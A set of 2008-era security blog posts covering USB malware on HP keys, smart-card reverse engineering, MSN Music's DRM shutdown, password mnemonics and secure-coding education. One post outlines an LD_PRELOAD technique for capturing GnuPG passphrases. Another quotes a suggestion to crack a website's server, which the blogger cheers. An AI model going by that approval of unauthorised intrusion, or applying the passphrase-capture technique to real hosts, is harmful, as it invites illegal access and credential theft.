Virus: even HP

Posted on by
Reply

HP announced that some USB keys shipped with floppy disk reader for HP ProLiant servers are infected by two minor virus; SillyFDC and Fakerecy. Up-to-date anti-virus detect them. But, if you install the floppy reader before the anti-virus software …

It was already troublesome that some consumer electronic devices (see security newsletter 9 to be published tomorrow) were infected by virus. It is really problematic in case of professional devices and applications.

USB keys become pervasive. They are a perfect vector for worms. A good protection is to disable autorun for every USB port. And of course keep your anti-virus always up-to-date.

“Big Gun” is back

Posted on by
Reply

Is History always stuttering? In 2002, French broadcaster Canal+ sued NDS for having reverse engineered the software of its smart card, and having organized the leakage of the pirated software through the site DR7.com. Christopher TARNOVSKY, a former hacker known as “Big Gun” and employee of NDS, was supposed to have participated to the operation. The complete story is worth the best spying books or Hollywood action movies.

Six years later, the same story again but with Dish Network. Christopher TARNOVSKY is testifying in front of a court. He recognizes that he worked for NDS and that he wrote a tool “the stinger” able to communicate with any smart cards. He claimes that he did not use his skills to break Dish Network’s security. NDS recognizes that it did reverse engineer the smart cards and then enhance their security to create a better product. NDS denies that it is disseminated the code of pirate cards.

Communicating with any card is not the difficult part. Accessing the code and data of the card is difficult. Reverse engineering a piece of software, or hardware is a common practice in security research. The only way to validate the strength of a secure system is to attack it. And that must be done by a team different from the team that designed the system. Furthermore, the attacking team must have hacking skills to “mimick” the real world environment.
Therefore, for a security company to hire skilled people to evaluate their security is a good practice. Of course, there is always some related risk. There must be a strong trust relation between the attacking and designing teams.

Once more, security is about TRUST.

MSN music will not deliver new licenses

Posted on by
Reply

On November 2006, MSN music closed its service. The service was not successful at competing with Apple’s iTunes. Recently, Rob BENNET, Microsoft, announced that they will not deliver anymore keys after 31 August 2008.
Why would you need new keys although MSN music does not sell anymore new songs? MSN music sold songs to be consumed on a given computer. Thus, the license containing the decryption key is linked to the targeted computer. The linking uses unique characteristics of the computer, such as configuration, or hard disk identifier. These characteristics are sometimes called computer fingerprinting. Therefore, there are two legitimate conditions to ask for new key (or more precisely new license) for an already purchased song:

  • The configuration of the computer evolved, for instance adding a new piece of hardware, or maintenance
  • The consumer replaces the old computer and transfers her songs to a new one.

In other words, after August 2008, consumers will not anymore be able to listen to their legally purchased song if they change computer. Rob BENNET announced that Microsoft did not succeed to negotiate DRM free songs with studios. It is surprising that the merchant of the songs is Microsoft, and the supplier of the DRM technology is Microsoft. And Microsoft did not find a solution? Perhaps, it is a strategy of Microsoft to get DRM free content. An interesting question: is MSN music liable? Is a class action possible by fooled consumers?

Unfortunately, this story gives new strong arguments to the DRM opponents. The problem is not too much about the DRM. The problem is that the song is linked to a computer rather than to a “larger” entity. Would the song be linked to the customer rather than to her computer, this problem would be solved. Would Microsoft DRM be interoperable with another DRM, this problem would be solved.

An example of solution is the domain. A domain is the set of devices belonging to a person, or a family. Would the song be attached to a domain, it would not be managed by a merchant. Currently, two systems support domain based DRM: DVB-CPCM and Coral. Unfortunately, they are not yet implemented in consumer devices. This story may be a booster for these solutions.

Is open source more secure?

Posted on by
1

Always in the same issue of 2600, phundie describes an attack on GnuPG: an open signature programme. He used Linux command LD_PRELOAD to overload a shared library. By analyzing the software in passphrase.c from the GPG distribution, he spotted the use of functions read() and memcpy(). He wrote a software to overload them and to dump the data in a file. Later, it was rather simple to spot the potentially dialed passphrase.

In the paper, he proposes several countermeasures such as using only static binary, rewrite its own procedures, or verify that LD_PRELOAD is not modified.

This paper clearly illustrates that open source is not adapted to hostile environment. It gives a strong advantage to an attacker who controls the host. It would be interesting to write a good paper analyzing the trust model of open source software highlighting the assumptions. Any volunteer to be co-author?

A glimpse at hacking mentality

Posted on by
Reply

While reading spring 2008 issue of hacker magazine 2600, I had fun with the paper Password Memorization Mnemonic from Agent Zero. The paper in itself is not extraordinary. Agent Zero has reinvented the notion of key derivation. He proposes, in a non formalized way, to use a password generating function for each site that would use the name of the site has parameter. He ends up with passwords in the format <site name><code name><number>. This is a typical trick and you may devise your own function adding for instance special characters.

Is it a good trick? In fact, it is hardly more secure than using the same strong password on all sites. The security relies on the secrecy of the <code name> and of the algorithm (Kerckoff!). And with such a weak algorithm (mandatory weak because it is a mnemonic), if you have the password for one site, it is not difficult to guess the algorithm.

The interesting point comes at the end of the paper. Some sites, for instance mySpace, limit the length of the passwords. This ruins the algorithm. Normal users would propose a derived function that would concatenate to stick in the requested length. But Agent Zero is a hacker, therefore he proposes:
1. Find a similar site with a better password policy.
2. Crack the webpage, system, or server. Show the webmaster or system administrator just how weak their current policy is, thereby spurring them to strengthen it. Admittedly, this is a more extreme-not to mention illegal-road to take, but it has been taken, and it has gotten results. (Extract)
I love option 2. Definitively another mentality  :Wink:

Book: The Big Switch

Posted on by
Reply

Nicholas CARR was the author of Does IT Matter? In this first book, he questioned the future role of IT. He was forecasting the end of IT. In this new book, he continues his prediction with the advent of cloud computing.

He forecasts that computing power will become an utility as power supply. He makes the parallel with the transition to electricity power. Big companies such as Amazon (Elastic Compute Cloud EC2) or Google are offering grid computers to external companies. The interesting part of the book is the analysis of the impact it will have in conjunction with the advent of Web2.0 It has already allowed small companies to succeed without having huge IT infrastructure.

The book also highlights the current trends of Web2.0. Chapter 7: From the Many to the Few is extremely interesting. It describes how companies such as YouTube, or PlentyOfFish are using, for quite nothing, mobs of good willing “content creators”. Chapter 8: The Great Unbundling is about the transformation of content consumption. He predicts that the future of Internet will not be as bright as expected.
“But it’s clear that two of the hopes most dear to the Internet optimists-that the Web will create a more bountiful culture and that it will promote greater harmony and understanding-should be treated with skepticism. Cultural impoverishment and social fragmentation seem equally likely outcomes.”(extract)

The security threats highlighted in the book are the typical malware and privacy issues.

A book to read because it sheds a provocative light on the future of Internet.

Oracle wants secure coding aware students

Posted on by
Reply

In her blog, Mary Ann Davidson, CSO at Oracle, is highlighting a weakness in the supply chain of software. She castigates US universities for not training software students in secure coding. She is awfully right, and it is not limited to US universities. Secure coding should be part of the normal programme of software development like methodologies, algorithmic and languages. Very few students have this secure coding background when joining the industry. Unfortunately, security becomes pervasive.

If students would have secure code lectures, this would not mean that they would become good at secure coding. It requires a given mindset (hacker minded?). Nevertheless, we could expect some benefits:

  • Some elements of secure coding in their day to day work
  • Avoid some basic errors in their production
  • And most important, they would be security aware. They would ask knowledgeable people to put the right solution in place. They would avoid writing software with highways for hackers. They would be more robust against social engineering.

One of the challenges for teaching secure coding is that secure coding is not as advanced in formalization then other elements of software programming. Secure coding is very much based on heuristics and some pinches of black art. Academic communities should invest more in this field. More conferences should treat this topic. Furthermore, practitioners should teach in universities. Only real practical knowledge can generate secure code. Industry should help universities in this challenge.

She proposes also to have students hack each other solutions. This would be a revolution, but a good practice. It creates the right mindset. Hackers are used to that at conferences such as DefCon, Black Hat or Chaos Computer Camp. Even some governments experiment such challenges (See Défi Sécurité Système d’Exploitation Cloisonné et Sécurisé pour l’Internaute ). Should we not have such hacking challenges between universities?

I would like just to cite a dreadful statement, unfortunately true.
We simply – and collectively – must evolve to defensive mindsets delivering defensible code lest none of us survive in a hostile world.